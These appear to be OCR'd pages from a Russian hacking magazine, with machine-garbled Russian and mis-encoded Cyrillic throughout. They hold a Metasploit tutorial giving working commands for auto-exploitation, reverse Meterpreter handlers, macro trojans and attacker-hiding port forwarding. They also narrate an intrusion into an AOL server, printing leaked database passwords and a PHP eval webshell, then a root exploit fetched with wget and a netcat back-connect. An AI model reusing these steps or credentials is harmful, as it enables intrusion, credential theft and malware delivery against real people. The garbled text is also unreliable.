WSDL. с тем отыскать в нем значительнее уязвимостей. К примеру. для которых специалисты во своих областях проводят муштрование других пентестеров. где каждый был способным зарегистрироваться. включительно курсы. которая выполняет данные действия. WSDL Scanning. AppPrint (Beta) — утилита. отнюдь не не мудрствуя лукаво SQL-инъекция. таких в духе HITB. В общем.59 равно Microsoft-IIS/7. Само по мнению себя ни нежели никак не отличает ся ото попсовой SQL-инъекции на окошке ввода логина да пароля. ведь тулза DOMScan. на принципе. "_blank").substring(0. Подробно показать функционал не предостаточно места.

да по мнению чужим примерам можно что-то свое путное сделать. cd /msf3 XÀÊÅÐ 00 /141/ 00 .. È ÷òî ðàäóåò — MSF ïðîäîëæàåò ðàñòè è ðàçâèâàòüñÿ! À â êàêîì íàïðàâëåíèè — óçíàåøü èç ýòîé ñòàòüè. что до знаниях. âêëþ÷àÿ â ñåáÿ âñå íåîáõîäèìîå — îò ñáîðà èíôû äî ïðîäâèíóòûõ ñïîñîáîâ ïîñòýêñëóàòàöèè. ÃÓÈ ÂÎÇÂÐÀÙÀÅÒÑß! Для тех. MSF âïîñëåäñòâèè èç ïðîñòîãî ôðýéìâîðêà äëÿ íàïèñàíèÿ ðàáî÷èõ ñïëîèòîâ ïðåâðàòèëñÿ ñíà÷àëà â íåêèé «øâåéöàðñêèé íîæ». Точнее. в такой мере в духе всеобъемлющих статей/книг об Metasploit’е хоть в английском нету. сколько Руби — материя простая. в таком случае она написана возьми Java. было жребий брошен сообщить относительно более-менее продвинутых встроенных возможностях его самого. Çàïóñêàåì Cygwin êîíñîëü 2.4. несомненно личные исследования. Она изменилась равным образом снаружи. да равно беспричинно со стабильностью были проблемы. Íå çðÿ âåäü MSF âõîäèò â ïÿòåðêó ñàìûõ þçàåìûõ òóëç. эх! Но нет слов эпоха подготовки статьи стряслось хорошее — новая гуишная оболочка. Если малограмотный ошибаюсь. То питаться использовать до этого времени можно. так 060 как от версии 0. Плюс радует.com ËÀÁÎÐÀÒÎÐÍÛÉ ÏÐÀÊÒÈÊÓÌ ÏÎ METASPLOIT FRAMEWORK Ñêðûòûå ôèøêè MSF Ïîÿâèâøèñü íà ñâåò 0 ëåò íàçàä. проанализировав навыки народа в рассуждении фрэймворке. а об их автоматизации хорош сказано соответственно ходу.3 сверху нее забили. Это чтобы люд далеко не изобретали железный конь :). Но для делу! Все описанное касается последней версии — MSF 0.ВЗЛОМ Тюрин «GreenDog» Лексей Запуск гуи делается во двум стадии: стартуем msfrpcd.. существует гуишная пелена получи и распишись основе GTK. так а самое приключилось равным образом от msfweb. Под никсами запустив msfgui дозволительно без затей крикнуть «start new msfprcd» Версия к Win: 1. существовала. кто такой безграмотный любит кронштейн либо — либо неподвижность соображать от командами MSF. Изначально во статье предполагалось воссоздать внутренние резервы автоматизации действий во MSF. Если точнее. Неудивительно. в таком случае очищать не возбраняется истощить ее удаленно. à òåïåðü — â öåëóþ ìàñòåðñêóþ ïî ïðîâåäåíèþ ïåíòåñòîâ. поелику кроссплатформенна. что-нибудь их безграмотный что-то около много. Так что основные нычки вместе с инфой — иностранные блоги. коннектимся для нему через msfgui. равным образом внутри. но. да для тому но взаимодействует вместе с MSF при помощи XMLRPC интерфейс. а тут.2. Кстати.

Кстати. например. êîòîðûé õðàíèòüñÿ â %MSF%\ msf3\data\gui ëèáî äâîéíûì êëèêîì. Там но дозволено настроить самовластно SQL-сервак. найти отношения в обществе отдельными модулями MSF. Под Win: ставим. полученные с Nmap.168. либо импортированная из сторонних программ. БД одна. ëèáî â êîíñîëè (íå â cygwin’e): java –jar msfgui. msfrpcd -S -U username -P password ãäå –S — îòêëþ÷åíèå SSL. Но трудиться можно. На основе сего работает XÀÊÅÐ 09 /140/ 00 Итог ото модуля порт-сканера изо MSF короче аналогичным. Для примера просканируем хост nmap’ом равно результаты попадут на нашу БД: msf> db_nmap –PN –sV 092.д. что такое? равно позволяет нам. Вряд ли возлюбленный бросьте раз- 061 . Для этого пихнем во обложка (metrevhandl. WMAP — сие старание заточить MSF подина веб-приложения и недавно автоматизировать по сию пору сие дело.0.. В него бог рационально запихнуть коннект в БД. который-нибудь машинально запускается около старте msfconsole. Кое-чего. никак не хватает. полазать по чужому компу равным образом т.101 PORTS 0-1000 -j Чтобы автоматизировать последние действия. создаем еще одного пользователя «Роли входа» (msf_user). обмена ей средь своими модулями.rc — скрипт. равно исходняк тоже попадут во БД. Иначе — основывать базу вручную во Postgres’е. например.0. Попробуешь — поймешь. что в сих скриптах дозволено строчить шифр получи и распишись Руби. Вообще. ÑÁÎÐ ÈÍÔÎÐÌÀÖÈÈ Тебе приходится оказываться известно. просканированных либо модулями. со MySQL в свою очередь хоть сколько-нибудь отнюдь не четко пошло. Nexpose.rc Как смотри — ужас удобно. только db_autopwn. Но сие покамест никак не все. IP равным образом коннектимся. Самое третье во том. либо встроенным nmap’ом. db_notes — «заметки». Например. Драйвер в целях взаимодействия вшит на MSF. основание автоматично создастся. По сути сие обычные текстовые файлики вместе с последовательным перечислением команд в целях MSF. порт. верно равным образом весь любые действия во MSF.101 В msfgui вводим логин/пасс.1:5432/msf_db Теперь повеление db_create никак не работает напрямую. Вот только лишь про определения сервисов должно утилизировать ранее другими модулями (все aux-модули от «version» получи и распишись конце в разделе scanner. От SQLite отказались с подачи вопросов производительности/ масштабируемости. доступа для рента alias прокол логов. сделав его «побезопасней». шелл получен PostgreSQL + MSF. создадим ресурсик для быстрого запуска «сервера» про реверсового meterpreter’а. ÂÕÎÄÈÌ. особенно если требуется по части быстрому пробежаться за сплоитам. вроде версии ОС. так-таки не грех утилизировать workspace’ами. аж по части сравнению со старой гуи. ага равным образом полазать объединение таблицам MSF. например. сколько MSF работает со БД про складирования информации. На основе сего работает db_autopwn из параметром –p (по портам). Жаль. только модули обмениваются/добавляют инфу всего лишь в текущем спэйсе. Для начала.168. msf> msf> msf> msf> use set set run scanner/portscan/tcp RHOSTS 092.168. Проект WMAP ноне находится держи ранней стадии да работает неграмотный отдельно хорошо. разве поглощать соответствующие карт-бланш (как у юзера postgres).jar.0.msf3/msfconsole. особенно по сравнению со своими конкурентами. создаем БД во «Базы» (msf_db). home/. Через pgAdmin: коннектимся ко локальному серваку.rc) следующие команды: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LPORT 0444 set LHOST 092. позволяется всего лишь коннектиться ко существующей БД.0. И сие направление активно развивается. WMAP.browser_autopwn во действии: разночтение браузера/ОС определена. Но сие отнюдь не этак страшно. либо импортом с Nessus’а(OpenVAS). scanner/imap/imap_verison).jar db_autopwn из параметром –x (по уязвимостям).. позволено прибегнуть этак называемыми resourceфайлами. Немного разберемся со командами: db_service — выводится инфа касательно портах/сервисах. задаем пасс про юзера — postgres и порт. другими словами какието «подробности» полученые WMap’ом. çàïóñêàåì msfgui. сплоит запущен. Например. è ïðèäóìàííûå ëîãèí/ïàññ 4. не смотрит db_notes с целью выбора сплоита. единственная вполне поддерживаемая БД — это PostgreSQL. модулям. найденные либо модулями MSF(WMap). настройка Postgres’а отнюдь не должна родить проблем.0. и. Команда db_create 3. похоже. db_vulns — уязвимости. db_workspace тебе во помощь. таблицы те же.102 exploit –j back Запускаем выше- скрипт из через «resource»: msf> resource metrevhandl. В msfconsole: msf> db_driver postgresql msf> db_connect

Копирование текста во cygwin’е делается из через левой/правой кнопки мыши. Команда db_edit виваться. который-нибудь короче применяться.102/index.102 set URI index. но упекать exe-файлы — сие весть палевно. Вещь. ась? популярно из названия. Äîáàâëÿåì æåðòâó: msf> wmap_targets -a http://www. ко тому но всегда команды поддерживают хелп параметром «-h». изумительный всяком случае. таково ась? можно ожидать фузия внутренностей или — или функционала MSF да w3af. db_notes. Это позволительно свершить от через команды setg.0. Если хочешь отложить действие команды — Ctrl+C. -m — задают регекспу к выбора сплоитов. Бесплатный сплоитпак получается. VBA В разделе EasyHack автор этих строк поуже писал об создании «троянов» вместе с через MSF. Вдобавок любителям помучить базы данных всевозможными инжектами советую рассмотреть часть MSF — scanner/http/sqlmap. Потом открываем подцепленный VBA. db_autopwn. Но желательно бы порядком потестить. но самое приятное во том. создадим сервак от бэкконнектом для того шеллов 092. вложение — Shift+Insert. Но все а куцый первообраз (требуется отсоединение для БД): 1.168. этак и клиентские возможности(JavaScript) за детекту. 1. Ïîäãðóæàåì ïëàãèí wmap: msf> load db_wmap 2.1 2. Инфу в отношении тулзе допускается добыть для сайте создателей — sqlmap. Пока сколько первый фичей модуля является точное определение версии браузера/ОС. а дальше до сейте поры равно предупреждения от винды. Например. Юзеры в данный момент стали пугливые равным образом невыгодный открывают все. Для некоторых модулей надо наладка параметров. Также во WMAP питаться паучишка (wmap_crawler) равно случай взаимодействия вместе с прокси (wmap_proxy). на своем нынешнем виде.ВЗЛОМ PostgreSQL + MSF. осуществляется сквозь модильон cygwin. По сути. Из имеющихся сплоитов недурно валятся олдскульные версии браузеров. то эта — почти клиентские.0.example. что-нибудь прямо-таки приобщать близкие сплоиты. экселевский документик со страшными именем «Зарплата сотрудников». Под виндой подступ ко интерфейсам msfcli.1 со Nexpose дозволено подвизаться лично изо MFS да сразу автопавнить сверху основе выявленных уязвимостей. что-то Rapid7 азбука бог битком внести долю опенсорсный w3af фрэймворк. рисунок).0.101 BROWSER_AUTOPWN Если предыдущая павнилка была заточена по мнению стандартные сплоиты.3. вместе с версии 0. Ïðîñìîòð è çàïóñê ìîäóëåé ïðîòèâ íàøåé æåðòâû: msf> wmap_run -t msf> wmap_run –e Итоги складируются на БД да доступны чрез db_vulns. модуль определяет версию браузера равно ОС. а причинность в том. Çàïóñêàåì òîëüêî ëó÷øèå ñïëîèòû ïî íàéäåííûì óÿçâèìîñòÿì: msf> nexpose_scan -R excellent -x 092. какой-никакой равно заточен перед конъюнктура веба. как следует неграмотный удастся. В будущих версиях обещают прикинуть внутренние резервы до обфускации сплоитов (чтобы антивирями неграмотный палилось) равным образом потенциал за выбору нагрузок. а сие уже сила.net. Это пристань одноименной тулзы — SQLmap. например.vba Далее создаем.168. Используются в духе серверные. отослать во бэкграунд — Ctrl+Z.0. Когда клиент заходит получи выше- сервак. XÀÊÅÐ 00 /141/ 00 . Автопавнилка во MSF обзавелась парой полезных параметров: -R — указывает наименьший ранк эксплойта.0. текст макроса (MACRO CODE) пихаем во макрос документа (Сервис –> ÍÅÑÊÎËÜÊÎ ÏÎÄÑÊÀÇÎÊ: В msfconsol’е подходяще работает автодополнение через нажатия Tab.168. Куда в меньшей мере палевно осуществлять какие-нибудь офисовские файлы: msf> db_autopwn -t -p -m windows -R excellent выведет ведомость всего-навсего лучших сплоитов около стандартные Win-сервисы. msfpayload равным образом т.php exploit -j Впариваем ссылку http://192.0. sourceforge. То вкушать обмануть модуль.168. подставив иной User-Agent. сей устройство поднимает HTTP-сервер равным образом получай нем но поднимает все сплоиты по-под браузеры. почто попало. Кстати. Ïîäãðóæàåì ïëàãèí è ïîäêëþ÷àåìñÿ ê Nexpose: msf> load nexpose msf> nexpose_connect нацеленные получи браузеры жертв. так наравне безграмотный всё-таки функции могут трудиться адекватно.com/ 3. мощная :). Например: Даешь роботизацию стране! ствующий сплоит. объединение ходу.д.php равно радуемся полученному шеллу (см. задним числом что-что запускает соответ- 062 msfpayload windows/shell_bind_tcp LPORT=5555 V > macros.102: msf> msf> msf> msf> use server/browser_autopwn set LHOST 092.

ведь строчкой вида «Внимание! Работа из базой возможна всего только присутствие включенных макросах. разделенные в части. «HTTPS» — шелл. «Bind» — патент порта равным образом будущий соединения. Обычный шелл — это.PXU RI=/ Причем. «Findport» — происходит отыскание сокета. пропускающим только лишь HTTP-трафик из корпоративного прокси-сервера. почто выше- шелл прописывается как элемент ActiveX. а согласование происходит посредством скрыXÀÊÅÐ 00 /141/ 00 Сканим подсетку вследствие Meterpreter тую версию IE объединение HTTP-протоколу. вишня…. «NoNX» — шеллкоды со обходом механизма защиты памяти DEP.com Макрос Æ Редактор VB). остальное подгружается присутствие подключении.168. если бы твоя милость ломаешь какую-то корпоративную сетку. Поиск осуществляется до номеру порта. хорошо. com/metasploitunleashed/ • metasploit. Начинок так много. Чтобы их включить.168. Инжект DLL’ок вкушать двух видов. Но их на MSF много. ÑÌÛÑËÎÂÀß ÍÀÃÐÓÇÊÀ На самом деле извлечение нагрузки(payload) ко сплоитам — дело важное. В таком случае ни одна другая погрузка невыгодный поможет. же когда твоя милость юзал meterpreter.0. «Findtag» — сродни предыдущему. «Meterpreter» — продвинутая наполнение :). особенно если бы твоя милость никак не знаешь настройки пользу кого прокси. благодаря этому невыгодный спокон века влезают во эксплойты.0. И об эту пору у нас снедать такая возможность.0. Это для самом деле круто. капуста. можно раскрутить пользователя влить макросы. разве прежде PassiveX работал исключительно по-под IE6. «DNS» — те. но привязанные ко статическим адресам на памяти системной DLL’ки. Up_exec» — шеллкод получи и распишись запуск команды. то теперь по сию пору окей да от IE7/8. «Ord» — «заточенные» нагрузки. Маленькие до размеру. Так наравне макросы по дефолту отключены (с версии OfficeXP. «dllinjection» — подкладывание DLL’ок во парамнезия процесса. «Stager» — нагрузки. некоторый общается до шифрованному HTTPS-протоколу (жаль.PXPORT=443. в чем дело? шары разбегаются MSF подходяще работает через портфорвардинг netcat Инфа касательно metasploit’е: • offensive-security. Суть заключается на том. на основном для того установки соединения. только лишь определение сокета полагается сообразно штату вслед расчёт прослушки всех доступных на ожидании прихода 0-байтового тэга с хакера. perl).101) уж повешен общепринятый биндшелл получи и распишись 0678 порту.168. 063 . а далеко не согласно IP. Во-первых. спустя некоторое время шелл открывается путем него. принимать точка соприкосновения разъединение согласно ОСям. этак на правах они жуть хороши. а во истечение документа — нашу «нагрузку» (PAYLOAD DATA). скачку/закачку равным образом запуск. «VNC» — запускаем VNC-сервер у жертвы.102 PXPORT=443 PXURI=/ X > reflmeter102.exe msf> use exploit/multi/handler msf> exploit -p windows/meterpreter/reverse_ http -o PXHOST=192. зачем могут нести записки и заботы согласно именам хостов. В сплоит попадает низкий шеллкод. А здесь — все настройки ради прокси да аутентификации получи нем (если она есть) поуже прописаны на IE.INFO info Абрикос.168.102. в какой мере мне известно). В початие документа не запрещается примолвить какие-нибудь подсчеты в целях красоты. Download_exec. особенно. Они большие. Общее расторжение до описанию: С пометкой «Inline» — сие «целиковые» шеллкоды. дабы появилось точки соприкосновения понимание. «Exec. Создадим нагрузочку равно прослушку подо нее (192. «metsvc» — до нитки загружает meterpreter жертве равно прописывает его на правах сервис. В итоге — шелл бери 0555 порту.0. где до этого времени сидят вслед за NAT’ом да не без; общим файерволом. вследствие какой работал эксплойт. минус поддержки прокси). Далее об обычных шеллах.102:443): msfpayload windows/meterpreter/reverse_http PXHOST=192.. Предположим у нашей жертвы (192. так тебе захочется к нему вернуться. «PassiveX» — свой шелл выступает элементом ActiveX. а приближенно же ПО равным образом подгружаемым интерпретаторам (ruby. зайдите на «Сервис Æ Параметры Æ Безопасность Æ Защита ото макросов Æ Низкая» равно перезапустите документ». что-то около что-то мы крошку пробегусь по ним (в основном в области Win*). конечно. «Reverse» — бэкконнект-шелл. Немного остановлюсь бери PassiveX.

маршрутизация) у меня недостает желания :). создает до данный поры одну сессию (создается еще одно соединение).168. для русскоязычных источников) да присутствие этом об всех стадиях взлома. Хотя сие также неграмотный плохо. так на своя рука из ними дозволяется использовать портфорвардинг держи поуже уделанной жертве. в надежде нас вычислили :). Macos). Предположим свой сервак не без; MSF. Его поуже сыздавна пытаются свести держи другие платформы(linux. будут устранены для выходу номера. есть хорошие новости: во каком-то виде meterpreter был перенесен на PHP! В «каком-то». вот эпоха юзания — пишем run равным образом вдвое Tab (для тех. правда нашлось пару гадких багов в MFS. netcat поддерживает SSL.0 0 К сожалению. который невыгодный на теме :). Не жуть показательно.168. Кстати.103:5555». благо. нынче переходим для самому вкусному — постэкслуатации и meterpreter’у. metsvc — прописывает meterpreter возьми автозапуск на реестре или в духе сервис. Кстати. надеюсь.0. nmap отнюдь не захотел утилизировать сим маршрутом — видимо.168. Вторая аргумент — выполняется вплоть до запуска шелла. meterpreter сие умеет: meterpreter> portfwd add -l 0008 -p 0222 -r 192.RPORT=5678 Хотелось бы сказать.101.0. которые. Но чтоб целое работало. ась? автор сих строк получили теледоступ для одному с компов (192. которые осталось только что реализовать. мигрирование за процессами равным образом токенам. Ведь мы но далеко не хотим. мы надеюсь. Скриптов входящих на поставку поуже много. находится до адресу «192.rb Коннектимся ко нему изо MSF: msf> use exploit/multi/handler msf> exploit -p windows/shell_bind_tcp -o RHOST=192. да постоянно хорош тип-топ. В общем.0. особенно сие относится для боевым нагрузкам. трансформирование реестра равно файловой системы. Давай предположим. касательно meterpreter’e. Надеюсь. либо указав переменную AutoRunScript или InitialAutoRunScript быть конфиге нагрузке/сервера. благодаря тому что во вкусе рас- 064 сказывать. Запускать скрипты можно либо ручками посредством команду run. Так аюшки? позволено охватить получай заваленный сервак равным образом потешиться таким крутым шеллом. елико симпатия красивый (и следов позже себя с малограмотный оставляет. Посмотреть существующие скрипты допускается на msf3\scripts\meterpreter. не такая глубокая интегрирование непостоянно что. persistence. Пока который значительная модулей MSF не поддерживают прокси. MSF несложно подгружает бэкконект meterpreter и. правда далеко не судьба. Meterpreter имеет чудесную реальность — автоматизация действий через руби-скриптов. Потому вспомним олдскульную фичу — портфорвардинг.129. твоя милость наслышан не без; meterpreter’ом.146.168. и работает во chroot’е) равным образом функционален (встроенные хак-тулзы. Так по образу у определенных хостов может бытийствовать ограничен путь изумительный внешнюю козни (где находимся мы). LPORT=8008.168.0. а ядро сейчас доступно. ÏÎÑÒÝÊÑÏËÓÀÒÀÖÈß Да.129) во корпоративой недотка равно пишущий сии строки (192. запустив его.168. так все еще когда-то со временем малограмотный совершенно гладко.0 055.168. симпатия у нас «1»): msf> setg LHOST 092. родилось под масть гениальных идей. Но обычными модулями. getcountermeasure — отключает файер.102) хотим развить наш триумф — просканить подсетку равным образом подрючить до этих пор что-нибудь. сплоитами да сканерами ничтоже сумняшеся (то принимать помимо каких-либо спецнастроек) можно пользоваться с целью развития атаки (см. творить — сие чудесно!z XÀÊÅÐ 00 /141/ 00 .168.255.146. первая — после.101 Теперь прописываем на payload’ах сплоитов LHOST=192.102 msf> setg LPORT 0666 msf> sessions –u 0 В итоге избавляемся с кучи напрягов равным образом ограничений обычного шелла. ÂÌÅÑÒÎ ÇÀÊËÞ×ÅÍÈß В статье аз многогрешный постарался инвентаризовать несколько новое (во всяком случае. может казнить процессы разнообразных антивирусов равно файерволов. рисунок) — всю маршуртизацию берет в себя MSF. Это достижимо круто. таково что. ее маска. фотосессия на маршрутизации) в msfconsol’е: msf> route add 092. где-то который позволено равным образом трафик.146. К тому же. нам надо определить глобальные значения своего хоста (куда коннектиться реверсу).103 0555” –l 00 --keep-open А во payload’ах наш брат прописываем IP (или DNS) да пристань подставного сервака. симпатия хорошенького понемножку тебе полезна. с самого стандартного: winenum — быстренько собирается все инфа по части системе с сетевых настроек давно установленного ПО да хешей. ожидающий бэкконнект шеллов. Добавляем авиамаршрут (подсетка. Теперь поговорим о собственной «безопасности». ибо в чем дело? далеко не целое функции позволяет реализовать PHP. если самолично шелл сего безграмотный позволяет. что такое? следующей командой наш брат превращаем обычный шелл во meterpreter.0. Тогда на подставном сервачке получи и распишись 00 порту наша сестра вешаем netcat: ncat --sh-exec “ncat 092.255. а впоследствии ранее «обновить» сессию (предположим. но работает :) Собираем инфу что до системе объединение средствам скрипта winenum.0.168. все-таки.ВЗЛОМ Плагин WMAP на действии. Но.

Реклама .

0. скачав сканер.. ÷òî â îäèí ïðåêðàñíûé äåíü ÿ íàòðàâèë ñâîé XSpider 0.7 íà îäíó èç ñåòåé AOL.12.evip.pl -u http://alex.255.x.com (Òîï-50 ïî ïîñåùàåìîñòè ñðåäè ñàéòîâ âî âñåì èíòåðíåòå).aol. # 04 Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability Versions effected: 0..Ãëÿäÿ íà âñå ýòî âåëèêîëåïèå. что-то возлюбленный работает получи и распишись CMS Joomla ветки 0. òû íå óäèâèøüñÿ. com.de 066 Через изрядно минут пишущий эти строки получил эскизно нижеуказанный результат: * Deduced version range is : [1.0 — 04.12 — 0.5.de от окнами ввода логина равно пароля бери главной странице. проживавших на указанном диапазоне.0.12.exe C:/joomscan/joomscan.. ìèëëèàðäíûé ðûíîê ðåêëàìû è äðóãèå íèøòÿêè.aol. Итак.5. ïîñìîòðåòü íà êîòîðûå òû ñìîæåøü ïðÿìî ñ ãëàâíîé ñòðàíèöû aol. быть ближайшем рассмотрении оказавшийся неким сайтом http:// alex.. Как известно.14] . ÆÅÐÒÂÀ DETECTED Из общей сложности обилия айпишников корпорации. первым делом меня привлек хост alex-aolde-mtc02.. # 09 Info -> CorePlugin: TinyMCE TinyBrowser addon XÀÊÅÐ 00 /141/ 00 .0. ñîòíè îôèñîâ âî âñåõ óãîëêàõ ìèðà.. Âîò ÷òî èç ýòîãî âûøëî. Vulnerable? Yes . AOL Mail è ICQ. одним с лучших сверху теперешний число решений ради поиска уязвимостей во Джумле является поступающий во программа OWASP «Joomla! Security/Vulnerability Scanner» ото ребят с YGN Ethical Hacker Group (ссылку получи и распишись скэнар ищи во сносках).255.12.ВЗЛОМ Anonymous ÍÎÊÀÓÒ ÄËß AOL Ïîëó÷àåì ïðèâèëåãèè ðóòà íà ñåðâåðå êîðïîðàöèè AOL Êîðïîðàöèÿ AOL âñåãäà ÿâëÿëàñü ëàêîìûì êóñî÷êîì äëÿ õàêåðîâ âñåõ âîçìîæíûõ ìàñòåé. мы запустил его следующим образом: C:/Perl/bin/perl5.5. Ñìîòðè ñàì: ìèëëèîíû çàðåãèñòðèðîâàííûõ ïîëüçîâàòåëåé â AIM.13 <= Check: /administrator/ Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.aol. íàõîäÿùóþñÿ â äèàïàçîíå 04. При первом но взгляде получи и распишись источник стало быть ясно.

. так что-то дале ваш покорный слуга мгновенно принялся заплескивать шелл вместе с помощью правки шаблонов Джумлы :) AOL INSIDE Шаблон в целях правки находился на админке в области следующему пути: «Extensions Æ Template Manager Æ aol-exit Æ Edit HTML». See: http://www. . входящими во группа поставки проги.com/exploits/9296 Vulnerable? Yes Ни одна с найденных «уязвимостей» ни сверху йоту безвыгодный помогла ми подбежать ко заветной цели взлома. .aol.aol. ÏÎÌÎÙÜ ÎÒ OWASP Осознав.de создавался одним с работников AOL для того координации проведения вечеринки промеж сотрудников германского выделения корпорации. ÁÐÓÒÔÎÐÑ — ÁÛÑÒÐÎ È ËÅÃÊÎ! Моей любимой программой на брутфорса различных хешей является PasswordsPro. по образу оказалось.. подошел.de/administrator.php. находится во сносках). Запустив программу. antichat.. падали регистрационные эмпирика юзеров alex. "wirwarendrin". "smtp.milw0rm.tar).aol. Brute Force Dirs. Пароль интересах юзера alex. скачав серия самых больших словарей изо топика http://forum. В верхушку указанного файла моя персона вставил небольшую кавайную конструкцию: 067 .de/. Далее логичным показалось испробовать проэксплуатировать логин да пароль от мускула на phpMyAdmin.Привилегии рута получены! . wirwarendrin.lg". ваш покорный слуга понял..tar. а тоже во alex. Название 00-метрового архива wirwarendrin. получай нем зарегистрировались и входили во труд состояние подле 050 бывших равно настоящих сотрудников AOL. вновь же.5. Select starting options: Standard start point.com".php. натурально же. непосредственно но файл шаблона лежал на /data/servers/wahl-o-mat_aol_de/pages/alex_aol_de/ templates/aol-exit/index.aol. во который.ru/showthread.php.php?t=13640 равным образом зарядив их во PasswordsPro на предмет брута соленого админского хеша d86f4c81342b79c4bab8868656c abe46:t65HKT9iuoOUdvfIAD0JP0ynT6EpRHXb..$salt). своего рода риноскоп аоловского ресурса. так как держи главной странице alex. var $user="alex". который после Джумлу ми вряд ли ли удастся пролезть получай нужный сервер. var var var var $smtpport $smtpuser $smtppass $smtphost = = = = "465".aol. var $password="wjedko. во котором хранились следующие интересные вещи: <?php class JConfig { XÀÊÅÐ 09 /140/ 00 .. мы вписал следующие настройки: Target URL: http://alex. Из всех полученных результатов свыше общей сложности меня обрадовали следующие: . Итак.3. из которым ваш покорнейший слуга успешно равным образом залогинился на alex. моя особа решил просканировать скрытые с посторонних мигалки директории равным образом файлы ресурса от через вновь одного проекта OWASP — брутфорсера директорий DirBooster (ссылка. на правах оказалось.com... Brute Force Files..aol. Я выбрал второй вариант. Содержимое архива вместе с бэкапом var $secret="NAAgXewXco6BSw2d". } ?> Первым делом ваш покорнейший слуга залез на почтовый рундук de./dnld. нежели автор тотчас же равным образом занялся :). ÕÐÀÍÈÒÅ ÁÝÊÀÏÛ Â ÑÁÅÐÅÃÀÒÅËÜÍÎÉ ÊÀÑÑÅ! В архиве не без; бэкапом меня паче сумме заинтересовал обложка конфига Джумлы configuration. Кстати.tar меня обрадовало. на часть числе.. var $db="test".de находилась упоминание получай wirwarendrin. выгода alex. multiple vulnerabilities Versions effected: Joomla! 0. phpMyAdmin-3. Number Of Threads: 000. После нескольких часов брутфорса прога выдала ми фраза на данного хеша — qwertyzuaor.2-english. Скачав продемонстрированный архив. что такое? во нем находится безраздельный бэкап нашего сайта :). что-то около что-то пользу кого дальнейшей заливки шелла оставалось банан варианта: присыпать нового админа в Джумлу сиречь сбрутить знак существующего админа. автор стал стоически ждать. "Briesben". содержащая на себя три файла (configuration. .aol. Work Method: Auto Switch (HEAD and GET). in fact there are many. Далее моя персона попробовал по части очереди брутфорс со всеми словарями.php (phpinfo).de./pma (phpMyAdmin) равно каталог ./info.de.12 Check: /plugins/editors/tinymce/jscripts/tiny_mce/ plugins/tinybrowser/ Exploit: While Joomla! team announced only File Upload vulnerability. поддерживает да микроформат шифрования паролей Joomla! — md5($pass. File extension: php.. которая. var $host="localhost".

/wunderbar_emporium.134.62.80.ru/thread103155. Так зачем после этого с помощью rpm автор скачал да установил nmap: rpm -vhU http://nmap. в чем дело? начисто однако файлы равно директории были открыты получи и распишись запись).chmod 0777 .uk. было сбор рута на данном сервере./* Следующей целью.ВЗЛОМ Таблица из юзерами Joomla! <?php eval(stripslashes($_REQUEST[aaa])).php" method="POST"> <input type="text" name="aaa"/> <input type="submit" value="Pwn It!"/> </form> Первым делом из через утилиты wget автор залил получи и распишись сервер WSO-шелл (http://forum.aol.62.exe -l -p 01337 Получив искомое.exploit-db. matrix.de: editor.tar xzfv wunderbar_emporium. gat.aol.php равно дым вместе с удобством просматривать совершенно файлы и директории (кстати. благо.tgz . нахватать который мне помог пошлый жемчужный Back-connect для 01337 порту мой дедика на WSO (раздел Network) равно ставший притчей вот языцех NetCat: c:/netcat/nc.aol. впоследствии выполнения нехитрой последовательности команд.134.tar czvf /tmp/1. аз многогрешный равным образом получил заветное «uid=0(root) gid=0(root) groups=11560(httpd)»: wget http://www.html) на ту а директорию templates под именем 004. до этого времени единственный косячок админа заключался во том. Таковым оказался. sns.grsecurity.62.tgz).00013s latency). Nmap scan report for 00. ?> Далее для этому делу оставалось насобирать мелкотравчатый HTML-клиент: <form action="http://alex..de/templates/aol-exit/ index. а непритязательно слил всё-таки исходники получи и распишись огболт своего дедика..0/24 Сейчас мы отнюдь не буду оглашать в рассуждении своих дальнейших действиях из сеткой немецкого AOL.pl следовать работой сети отечественный сервак скрывается подо адресом 00.fr. моя особа принялся вслед за поиски нужного рутового сплоита на http://www.aol.rpm и запустил его следующим образом: nmap -v -n -sS 00.sh ÈÍÒÅÐÅÑÍÎÅ После получения привилегий рута ми чего-то захотелось просканить внутреннюю сетку. былое равным образом унылое база сие позволяло: Linux wahl-o-mat.aol.com. немецкий «wunderbar emporium» (http://www.i386.de.grsecurity.tgz.net/~spender/wunderbar_ emporium.134. а покажу только парочку самых интересных отчетов сканера: Nmap scan report for 00. вторично же.aol. Далее. wahl-o-mat.antichat.00013s latency).de 0.de. которую моя особа себя поставил.net/~spender/wunderbar_ emporium. Not shown: 071 closed ports PORT STATE SERVICE 22/tcp open ssh 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 1024/tcp open kdm 1025/tcp open NFS-or-IIS 1027/tcp open IIS 1078/tcp open unknown 1112/tcp open msql XÀÊÅÐ 00 /141/ 00 .134.6. который в 068 joomscan.org/dist/nmap-5./*.89 Host is up (0.9-55. Для сего моя персона выполнил команду ifconfig равно узнал.21-1. Сильно ориентироваться из их строением и значением пишущий эти строки отнюдь не стал.96 Host is up (0. сперва запаковав поголовно стафф из через следующей команды: cd /data/servers..tgz.aol. ÅÙÅ ÃËÓÁÆÅ! В директории /data/servers моментально но не запрещается было взглянуть в сайтысоседи нашего alex.co.62.ELsmp #1 SMP Fri Apr 20 07:03:35 EDT 0007 i686 Для основы ми был необходим диалоговый шелл.com.nexus.aol. Not shown: 086 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 135/tcp open msrpc 445/tcp open microsoft-ds 1024/tcp open kdm 1041/tcp open unknown 1051/tcp open optima-vnet 1311/tcp open rxmon 1801/tcp open unknown 2099/tcp open unknown 2103/tcp open zephyr-clt 2105/tcp open eklogin 2107/tcp open unknown 3389/tcp open ms-term-serv MAC Address: 00:18:8B:74:52:6E (Dell) .

